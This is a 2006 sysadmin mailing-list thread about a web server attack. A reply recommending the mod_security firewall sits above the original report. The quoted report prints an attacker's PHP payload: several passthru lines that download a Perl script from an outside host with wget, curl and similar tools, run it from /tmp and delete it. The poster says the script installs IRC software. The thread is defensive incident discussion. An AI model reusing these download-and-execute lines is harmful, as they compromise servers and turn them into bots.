Have you considered putting an application firewall on your box?
We installed mod_security on our servers - these attacks can then get
bounced off. Providing you keep an eye open for new attack methods, you can
then stay on top of it.
www.gotroot.com
www.modsecurity.org
Regards
Paul
----- Original Message -----
From: "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
To: <coba-e (at mark) bluequartz.org>
Sent: Saturday, September 09, 2006 9:44 PM
Subject: [coba-e:06808] /TMP Directory
> There was some discussion here lately about the security fix that stopped
> programs from running in /TMP. Is this configured by default if you have
> your BQ Yum updated? I got a DDOS today where the users were trying to
> run
> the following program via PHP:
>
> <?
> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
> v6.txt;rm -f v6*');
> passthru('cd /tmp;curl -O http://perqafohu.com/~armendibx/oki/v6.txt;perl
> v6.txt;rm -f v6*');
> passthru('cd /tmp;lwp-download
> http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;lynx -source http://perqafohu.com/~armendibx/oki/v6.txt
>>v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
>>v6.txt;perl v6.txt;rm -f v6*');
> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
>>v6.txt;perl v6.txt;rm -f v6*');
> ?>
>
> The v6.txt is a Perl script that installs some IRC software and monitors
> IRC
> on open ports. I do not think the script was successful in running, but I
> just want to make sure the /TMP security is enabled where files can't be
> run
> there. While I don't think the DDOS attack was successful in running the
> script, it was successful in shutting down the serer due to MySQL becoming
> overwhelmed. Server load was up to 156!
>
> Any suggestions would be appreciated.
>
>
--
This message has been scanned for viruses and
dangerous content by Swift Internet, and is
believed to be clean.